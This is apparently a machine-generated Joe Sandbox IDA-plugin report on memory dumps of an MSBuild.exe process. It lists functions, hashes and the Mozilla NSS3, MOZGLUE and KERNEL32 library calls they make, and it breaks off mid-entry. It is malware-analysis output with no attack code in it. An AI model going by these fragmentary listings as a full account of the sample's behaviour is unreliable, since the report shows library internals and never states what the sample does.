Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID:
API String ID: 2963671366-0
Opcode ID: 57f673e4761bc0d4fc41539cfc998012ec7c80523012d1fa7219b67e97814b10
Instruction ID: 93a920bcf755b559a6e7549ebbc6c6f268e8ea7968ef45dad0ecb6f02d74eecd
Opcode Fuzzy Hash: 57f673e4761bc0d4fc41539cfc998012ec7c80523012d1fa7219b67e97814b10
Instruction Fuzzy Hash: F821F2B0A00647AFDB009F69DC445BABBB4FF09319F004539E849E7B11EB31E964CB92

Function 6CB504D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6CB504F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB5053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB50558
GetLastError.KERNEL32 ref: 6CB5057A

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: d315924901fb8080b65b611ecb35112511164a236b16c6d889f603c0ab6694e3
Instruction ID: e51c332cd27a411e6bcdfed494e8a196505f09f85d959d9c909c076c290ff3f2
Opcode Fuzzy Hash: d315924901fb8080b65b611ecb35112511164a236b16c6d889f603c0ab6694e3
Instruction Fuzzy Hash: 1B213071A001199FDB04DF99DC94AAEB7B8FF49318B108169E809DB351D775ED06CB90

Function 6CBD2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CBD2E08

Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CBD2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CBD2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CBD2E95

Part of subcall function 6CBC1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC1228
Part of subcall function 6CBC1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CBC1238
Part of subcall function 6CBC1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC124B
Part of subcall function 6CBC1200: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC125D
Part of subcall function 6CBC1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CBC126F
Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CBC1280
Part of subcall function 6CBC1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CBC128E
Part of subcall function 6CBC1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CBC129A
Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CBC12A1

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 633dc6f9f4a6d8ba95c7c119a4f5d328ad03c3bcdbeebd3367dd699adca0c9a5
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 8421D7B5E103C64BE700CF549D447AA3764AF9130CF160269DD08AB742F7B1E9948293

Function 6CB8ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CB8ACC2

Part of subcall function 6CB62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB62F0A
Part of subcall function 6CB62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB62F1D

Part of subcall function 6CB62AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB60A1B,00000000), ref: 6CB62AF0
Part of subcall function 6CB62AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB62B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CB8AD5E

Part of subcall function 6CBA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB6B41E,00000000,00000000,?,00000000,?,6CB6B41E,00000000,00000000,00000001,?), ref: 6CBA57E0
Part of subcall function 6CBA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBA5843

CERT_DestroyCertList.NSS3(?), ref: 6CB8AD36

Part of subcall function 6CB62F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB62F65
Part of subcall function 6CB62F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB62F83

free.MOZGLUE(?), ref: 6CB8AD4F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 19380ce2bd9b63ce9787ba4cd01c53f8b7a752faa7614d681a862e74a5cd3b78
Instruction ID: cd4aba03593e456cf25b62aaa5aeedc126372f88f2e589dc3ed189b1be978cbc
Opcode Fuzzy Hash: 19380ce2bd9b63ce9787ba4cd01c53f8b7a752faa7614d681a862e74a5cd3b78
Instruction Fuzzy Hash: D321E4B1D022548BEF10DFA5D8059EEB7B4EF15618F054068D805BBB41FB31AA49CFE6

Function 6CBA24E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CBA24FF
EnterCriticalSection.KERNEL32(?), ref: 6CBA250F
PR_Unlock.NSS3(?), ref: 6CBA253C
PR_SetError.NSS3(00000000,00000000), ref: 6CBA2554

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: ad4169a82936d4e8994ac8db2eae37866b3e968bc98352d0eb720cdcfb329f21
Instruction ID: 6d777c18ca10c5817f308f03d269ef2fca176a2b778a3d262933abf51791da3e
Opcode Fuzzy Hash: ad4169a82936d4e8994ac8db2eae37866b3e968bc98352d0eb720cdcfb329f21
Instruction Fuzzy Hash: F611D371E00118AFDB00AFA9DC459AA7B78FF05228F554164EC4997701E731ED55C7E2

Function 6CBBECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CBBF0AD,6CBBF150,?,6CBBF150,?,?,?), ref: 6CBBECBA

Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CBBECD1

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CBBED02

Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CBBED5A

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: a99ee5c7454f922a3a38e87f39057741101388af43f0342ce4c5c0cd0cc9f8f1
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: E021D4B1A007D25BE700CF25D944B6AB7E4FFA4308F15C256E81C97661EBB0E594C6D2

Function 6CBEEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEE14

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

memcpy.VCRUNTIME140(?,?,6CBD9767,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEE33

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 4392ba7bd14142785303a3c153d29995816e9f733faf13a05767c513917e1c2f
Instruction ID: 2bdc8526763e6bd92ee5abcef683a62b7f2274e19f49b1ff050f6c036a4eec51
Opcode Fuzzy Hash: 4392ba7bd14142785303a3c153d29995816e9f733faf13a05767c513917e1c2f
Instruction Fuzzy Hash: EB11C6B1A00796ABEB509E65DC84B4AB3A8EF0C79DF204535E91982A40F331F464C7E3

Function 6CB88DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB88DE7
EnterCriticalSection.KERNEL32 ref: 6CB88DFC
PR_Unlock.NSS3 ref: 6CB88E2D
PR_SetError.NSS3 ref: 6CB88E49

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 10e216c20624683ab044cf5ef9997be885af4dd7938682ade46eb4e814c063e0
Instruction ID: b8c7d6435e528886e275fe8effb78485c01d55ddefbf8b35e199627910143697
Opcode Fuzzy Hash: 10e216c20624683ab044cf5ef9997be885af4dd7938682ade46eb4e814c063e0
Instruction Fuzzy Hash: F6115E71A05A559FD700AF78D4885AABBF4FF05315F014969DC88D7B00E731E994CBE2

Function 6CC0AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CBF5F17,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CBF5F17,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACDB

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: a721327d5dc03c9f0a2a39475be6a909b5471e8677e0fe115898d3d1187fab6f
Instruction ID: 5816a3ccfae768ccd08d51e25325d7cac6c80b569f23d5744aaa5b23d15d1329
Opcode Fuzzy Hash: a721327d5dc03c9f0a2a39475be6a909b5471e8677e0fe115898d3d1187fab6f
Instruction Fuzzy Hash: 8C018CB1B01B019BE750DF69D908747B7E8BF40699B104839D85AD3A00E732E054CB90

Function 6CBCC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CBCC5AD

Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B

CERT_DecodeCertPackage.NSS3(?,?,6CBCC610,?), ref: 6CBCC5C2

Part of subcall function 6CBCC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBCC0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6CBCC5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBCC5EF

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: b757d6cb289ff71bf2a12ec7b0a11866bbf0a558ef318d2a810bd597b46df32a
Instruction ID: 1564fb5e370a75f36b1823d4e3912391f73518e7668da8345c2ac66b113cbde5
Opcode Fuzzy Hash: b757d6cb289ff71bf2a12ec7b0a11866bbf0a558ef318d2a810bd597b46df32a
Instruction Fuzzy Hash: AE01F2B5E001446BEB00AB64EC12EBF7B78DB00618F454069EC05AB341F631A919C6E2

Function 6CBC24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CB9C154,000000FF,00000000,00000000,00000000,00000000,?,?,6CB9C154,?), ref: 6CBC24FA
PORT_Alloc_Util.NSS3(00000000,?,6CB9C154,?), ref: 6CBC2509

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6CBC2525
free.MOZGLUE(00000000), ref: 6CBC2532

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: d0d1ec20d797cb5634e06764c34e19ab478740c11684c8e66acf207962efbc56
Instruction ID: 396cf411d07ac2af20456d1cdffb526064f7ff60b7569c5a1f459c5efa5762e7
Opcode Fuzzy Hash: d0d1ec20d797cb5634e06764c34e19ab478740c11684c8e66acf207962efbc56
Instruction Fuzzy Hash: 01F096BA70612137FA1025BAAC09E7739ACDB416F8B141231BD29D66C0D950DC0181F3

Function 6CC0AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC2D

Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
Part of subcall function 6CBAADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
Part of subcall function 6CBAADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
Part of subcall function 6CBAADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9

PK11_FreeSymKey.NSS3(?,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC59
free.MOZGLUE(8CB6FF01,6CBE6AC6,6CBF639C,?,?,?,?,?,?,?,?,?,6CBF5D40,00000000,?,6CBFAAD4), ref: 6CC0AC62

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 1376d080c3a2a803248cb8474f939fc0d8af668f8571998b1acb6e81a2a539b3
Instruction ID: b27e6d7f2b31cdc1d47b80b1e0c9e22cc91ed050bcdc249a311029beb2a2693f
Opcode Fuzzy Hash: 1376d080c3a2a803248cb8474f939fc0d8af668f8571998b1acb6e81a2a539b3
Instruction Fuzzy Hash: 96014FB5A002109FDB00DF65E8C0B5677A8EF44B58F198068E9899F706E732E845CFB1

Function 6CBF0450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6CBF4710,?,000F4240,00000000), ref: 6CBF046B
GetLastError.KERNEL32(?,6CBF4710,?,000F4240,00000000), ref: 6CBF0479

Part of subcall function 6CC0BF80: TlsGetValue.KERNEL32(00000000,?,6CBF461B,-00000004), ref: 6CC0C244

PR_Unlock.NSS3(40C70845,?,6CBF4710,?,000F4240,00000000), ref: 6CBF0492
PR_SetError.NSS3(FFFFE89D,00000000,?,6CBF4710,?,000F4240,00000000), ref: 6CBF04A5

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: fff4224dd6cc27ddbf85d4619432132acf77f6b3024bbea7331857864b9a17b3
Instruction ID: b66ecf201c65c92ca9196d7c300c69c9e2712808e6334e5ab8d789b83f7d81ad
Opcode Fuzzy Hash: fff4224dd6cc27ddbf85d4619432132acf77f6b3024bbea7331857864b9a17b3
